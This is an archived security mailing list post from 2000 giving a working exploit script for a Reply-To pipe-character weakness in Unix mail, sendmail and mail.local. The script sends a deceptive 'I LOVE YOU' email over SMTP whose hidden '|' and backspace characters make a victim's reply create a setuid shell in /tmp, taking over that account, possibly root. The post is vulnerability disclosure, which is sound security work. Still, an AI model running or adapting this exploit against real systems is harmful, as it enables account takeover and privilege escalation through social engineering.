mailing list archives
mail Reply-To field exploit
From: gregory duchemin <c3rb3r () HOTMAIL COM>
Date: Sun, 5 Nov 2000 21:56:17 GMT
because there are few people here that didn't seem to understand how
serious is the mail.local/mail/sendmail weakness i reported to bugtraq
few days ago (lack of imagination ? )
here is an exploit, not technicaly impressive but just enough powerfull to
deceive many people around here and take over their account priviledge.
I persist to claim that no | char should be allowed in any smtp/lmtp/mime
(even in contradiction with any rfc) because of the major security
vulnerability it introduce.
Note: It's NOT A BUG in mail, sendmail or mail.local but a weakness caused
by a bindly
I didn't try elm, mailx and others so feedback are welcomed
payback here is victim account take over by spawning a setuid shell
in /tmp. (even root)
Solution: take care about the reply-to recipient real anatomy. :)
I LOVE YOU letter for Unix
# Exploit for | char in mail Reply-To field
# tested on linux Caldera (techno preview linux 2.4.0)
# Gregory Duchemin ( AKA C3rb3r )
# Security Consultant
# NEUROCOM CANADA
# 1001 bd Maisonneuve Ouest
# Montreal (Quebec) H3A 3C8 Canada
# c3rb3r () hotmail com
# Cook Ingredients: one | char (hidden in an uppercase i),
# a bit of evil ^H to hide "/tmp/", and a girl to stimulate a reply ;)
cat ^H^H^H^H^Hsabelle () hotmail com << _End
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh
echo "HELO hotmail.com"
echo "MAIL FROM:<Isabelle () hotmail com>"
echo "RCPT TO:<root>"
# Reply-to will appear as Reply-To:<|sabelle () hotmail com>
echo "Reply-To:<|/tmp/^H^H^H^H^Hsabelle () hotmail com>"
echo "I saw you yesterday, since i'm a bit confused..i just wanted"
echo "to say you."
echo "I believe I LOVE YOU"
}|telnet localhost 25
echo "Job is done...now check for newsh in /tmp"
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
Share information about yourself, create your own public profile at
- mail Reply-To field exploit gregory duchemin (Nov 07)